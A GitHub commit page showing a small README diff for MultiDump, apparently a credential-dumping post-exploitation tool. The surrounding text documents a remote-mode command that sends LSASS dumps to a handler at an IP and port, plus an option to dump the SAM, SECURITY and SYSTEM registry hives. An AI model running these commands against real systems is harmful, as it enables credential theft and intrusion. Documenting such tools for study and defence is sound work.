Update README.md

Xre0uS · Aug 8, 2024 · 972fc30 · 972fc30
1 parent 4efe394
commit 972fc30
Showing 1 changed file with 2 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -85,6 +85,8 @@ In remote mode, MultiDump connects to the handler's listener.
 MultiDump.exe -r 10.0.0.1:9001
 ```
 
+In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible.
+
 The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`.
 
 An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.